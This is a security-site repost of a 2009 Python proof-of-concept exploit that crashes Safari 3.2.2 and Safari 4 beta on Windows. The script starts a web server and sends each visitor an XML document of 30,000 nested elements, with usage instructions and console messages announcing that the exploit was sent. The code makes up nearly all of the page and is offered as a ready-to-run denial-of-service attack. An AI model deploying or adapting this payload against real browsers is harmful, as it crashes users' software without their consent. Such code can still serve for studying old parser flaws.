首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Safari 3.2.2/4b (nested elements) XML Parsing Remote Crash Exploit
来源:ahmed.obied@gmail.com 作者:Obied 发布时间:2009-04-01  
#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Tested using:
#     -> Safari 3.2.2 on Windows
#     -> Safari 4 (BETA) on Windows
#
#   Usage  : python safari.py [port]
#   

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
       
    def get_exploit(self):
        exploit = '<?xml version="1.0"?>'
        exploit += '<A>' * 30000 + '</A>' * 30000
        return exploit
           
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == '/':
            print
            print '[-] Incoming connection from %s' % self.client_address[0]
            print '[-] Sending header to %s ...' % self.client_address[0]
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            print '[-] Header sent to %s' % self.client_address[0]
            print '[-] Sending exploit to %s ...' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print '[-] Exploit sent to %s' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print '[-] Exiting ...'
        except socket.error:
            print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)   
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
           
if __name__ == '__main__':
    main()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Podcast Generator <= 1.1 Remot
·VirtueMart <= 1.1.2 Remote SQL
·VirtueMart <= 1.1.2 Multiple R
·Trend Micro Internet Security
·PrecisionID Datamatrix ActiveX
·Trend Micro Internet Security
·The Cisco ASA5520 Web VPN suff
·Amaya 11.1 W3C Editor/Browser
·DeepBurner 1.9.0.228 Stack Buf
·Opera 9.64 (7400 nested elemen
·Oracle WebLogic IIS connector
·X-Forum 0.6.2 Remote Command E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved